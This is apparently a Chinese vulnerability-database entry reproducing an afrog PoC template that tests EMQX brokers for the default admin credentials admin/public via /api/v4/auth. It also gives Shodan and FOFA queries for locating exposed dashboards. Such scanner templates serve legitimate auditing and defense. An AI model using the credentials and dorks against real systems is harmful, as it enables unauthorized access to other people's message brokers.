emqx-default-login: Emqx Default Admin Login

漏洞描述

Emqx default admin credentials were discovered. SHODAN: http.favicon.hash:"-670975485" FOFA: icon_hash="-670975485"

PoC代码[已公开]

id: emqx-default-login

info:
  name: Emqx Default Admin Login
  author: For3stCo1d
  severity: high
  verifed: true
  description: |
    Emqx default admin credentials were discovered.
    SHODAN: http.favicon.hash:"-670975485"
    FOFA: icon_hash="-670975485"
  tags: emqx,default-login
  created: 2023/06/24

rules:
  r0:
    request:
      method: POST
      path: /api/v4/auth
      body: |
        {"username":"admin","password":"public"}
    expression: |
      response.status == 200 && 
      response.body == bytes("{\"code\":0}")
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/emqx-default-login.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

EMQX 后台上传插件致命令执行漏洞 无POC

EMQX 弱口令漏洞 无POC

EMQX Dashboard 弱口令漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

EMQX 后台上传插件致命令执行漏洞无POC

EMQX 弱口令漏洞无POC

EMQX Dashboard 弱口令漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC